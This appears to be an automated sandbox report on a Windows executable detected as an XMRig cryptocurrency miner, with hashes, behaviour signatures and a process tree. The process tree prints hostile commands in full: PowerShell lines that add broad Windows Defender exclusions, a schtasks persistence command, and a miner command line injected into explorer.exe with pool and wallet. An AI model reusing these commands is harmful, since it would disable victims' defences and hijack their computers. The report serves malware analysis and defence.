Overview

overview

10

Static

static

3

software.exe

windows7-x64

10

software.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    131s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    03/02/2025, 00:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    software.exe

  • Size

    2.1MB

  • MD5

    6648600886e0f5d8724a40f3464ab25f

  • SHA1

    d948a4a0013c122aa39f000756af32bf539407be

  • SHA256

    61bb0d4b9f339c0a84cbf52599127b716209f54599b023bdab0a75a062dfe678

  • SHA512

    11a9df844e7d2f5fcbbb7bb7e6b9554446cfc752d73504dc329fe7c50aeb5d4141ab1af825c1b14da4f386deaa6ddcfdb5ec7149a437c3c8e8a513f0665b5b0a

  • SSDEEP

    49152:d4N7/8t5eYbaB809DhpravdvAtm6X/rxfAm1Oa8kbsb190yIV72:Kk/aB807pravdgX/rxfRYa8kbA0F72

Score
10/10
xmrigexecutionminer

Malware Config

Signatures

  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 17 IoCs
    miner
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\software.exe
    "C:\Users\Admin\AppData\Local\Temp\software.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\software.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2480
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2220
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2256
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2736
      • C:\Windows\System32\cmd.exe
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2740
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2800
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1468
        • C:\Users\Admin\AppData\Local\Temp\services64.exe
          C:\Users\Admin\AppData\Local\Temp\services64.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1820
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
            5⤵
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2932
            • C:\Windows\System32\cmd.exe
              "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2940
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2816
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1948
            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1640
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\conhost.exe" "/sihost64"
                7⤵
                  PID:2428
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=49tv1FSCwfVSa2wwZj2NLKHxDzGJWsKG8X39b47qb4htVxujqMSxzvr5KSqNwMaJo9DW5j8XXhaxqHvwvBmDhjT6KmbArrz --pass=4wher --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2316
    • C:\Windows\system32\mmc.exe
      "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
      1⤵
      • Drops file in System32 directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:1552
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe"
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2284

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\services64.exe
      Filesize

      2.1MB

      MD5

      6648600886e0f5d8724a40f3464ab25f

      SHA1

      d948a4a0013c122aa39f000756af32bf539407be

      SHA256

      61bb0d4b9f339c0a84cbf52599127b716209f54599b023bdab0a75a062dfe678

      SHA512

      11a9df844e7d2f5fcbbb7bb7e6b9554446cfc752d73504dc329fe7c50aeb5d4141ab1af825c1b14da4f386deaa6ddcfdb5ec7149a437c3c8e8a513f0665b5b0a

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      49862a320920e6d0f6852e9038cd52b7

      SHA1

      34ccf2c972a115ee59e95cdd52f30a5f5ba8f6ca

      SHA256

      dc0f53db646452391e59096f87ac945de3405c1923a5e0946d04be6504ea19c3

      SHA512

      8f73857f911039ce8b75d0363e9a9726fb3c79474518e7f3fe503f172ca29a5df8a37c335a999466b724119bd1633f8506f33674e8d42273f0145073654f0ba3

      Download Submit

    • \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      Filesize

      32KB

      MD5

      a68d5a40285ece910927cdac2700f256

      SHA1

      af571db44bfdfa26f3f988bba5844278b9cd3352

      SHA256

      2d6a6f19d127048861f7427b6b7b9e760a110f516f5d199ba8b9d82e39e58f90

      SHA512

      43bd73b09a0c368e5d84aad4cc7dd1b4565e2e9e52781013edc1202a22fc428788521609e630edcc34b558132a1a862cf3eb99f8099ff17f059fa00eef2b0aa2

      Download Submit

    • memory/1552-89-0x00000000028E0000-0x00000000028FE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/1552-90-0x000000001D4B0000-0x000000001D7F6000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2256-16-0x000007FEF2410000-0x000007FEF2DAD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2256-11-0x000000001B730000-0x000000001BA12000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2256-12-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2256-14-0x000007FEF2410000-0x000007FEF2DAD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2256-13-0x000007FEF2410000-0x000007FEF2DAD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2256-15-0x000007FEF2410000-0x000007FEF2DAD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2256-10-0x000007FEF26CE000-0x000007FEF26CF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2256-17-0x000007FEF2410000-0x000007FEF2DAD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2284-92-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

      Download

    • memory/2284-91-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

      Download

    • memory/2284-93-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

      Download

    • memory/2284-94-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

      Download

    • memory/2316-62-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2316-58-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2316-85-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2316-76-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2316-77-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2316-46-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2316-48-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2316-52-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2316-78-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2316-50-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2316-68-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2316-70-0x000007FFFFFDE000-0x000007FFFFFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2316-72-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2316-74-0x0000000000070000-0x0000000000090000-memory.dmp

      Filesize

      128KB

      Download

    • memory/2316-66-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2316-64-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2316-60-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2316-79-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2316-56-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2316-54-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2316-71-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2316-75-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/2428-86-0x0000000000060000-0x0000000000066000-memory.dmp

      Filesize

      24KB

      Download

    • memory/2428-87-0x0000000001B40000-0x0000000001B46000-memory.dmp

      Filesize

      24KB

      Download

    • memory/2480-25-0x000007FEF5410000-0x000007FEF5DFC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2480-26-0x000007FEF5413000-0x000007FEF5414000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2480-32-0x000007FEF5410000-0x000007FEF5DFC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2480-0-0x0000000000150000-0x0000000000371000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/2480-5-0x000007FEF5410000-0x000007FEF5DFC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2480-4-0x000007FEF5410000-0x000007FEF5DFC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2480-3-0x000007FEF5410000-0x000007FEF5DFC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2480-2-0x000000001B560000-0x000000001B780000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/2480-1-0x000007FEF5413000-0x000007FEF5414000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2736-24-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2736-23-0x000000001B790000-0x000000001BA72000-memory.dmp

      Filesize

      2.9MB

      Download